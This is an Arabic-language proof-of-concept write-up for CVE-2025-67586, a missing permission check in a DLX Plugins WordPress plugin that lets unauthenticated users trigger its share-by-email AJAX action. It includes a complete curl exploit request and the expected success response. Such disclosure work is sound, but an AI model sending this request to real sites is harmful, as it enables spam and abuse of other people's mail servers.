
تقارير تحليلية لـ (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
كتابات عن (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
-------------- CVE-2025-67586 استغلال - إثبات المفهوم --------------
==> الوصف توجد ثغرة في التحكم في الوصول في إضافة WordPress مطورة بواسطة DLX Plugins. تعرض الإجراء AJAX غير المصادق عليه الذي يسمح للمهاجمين بإساءة استخدام وظيفة "المشاركة عبر البريد الإلكتروني" دون فحوصات أذونات مناسبة.
يمكن للمهاجم غير المصادق عليه إعادة استخدام nonce صالح لمنشور لتشغيل طلبات مشاركة البريد الإلكتروني، مما يؤدي إلى إرسال بريد إلكتروني غير مصرح به (بريد عشوائي / إساءة استخدام) دون مصادقة المستخدم.
==> الصلاحيات المطلوبة لا شيء (غير مصادق عليه)
==> إثبات المفهوم (PoC)
الخطوة 1: اختر موقع ويب به الإضافة المثبتة
الخطوة 2: الحصول على nonce صالح
الخطوة 3: الاستغلال عبر طلب غير مصادق عليه
أمر bash: (استبدل رابط الموقع، رابط المنشور، و nonce)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed
--> استجابة JSON المتوقعة:
{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }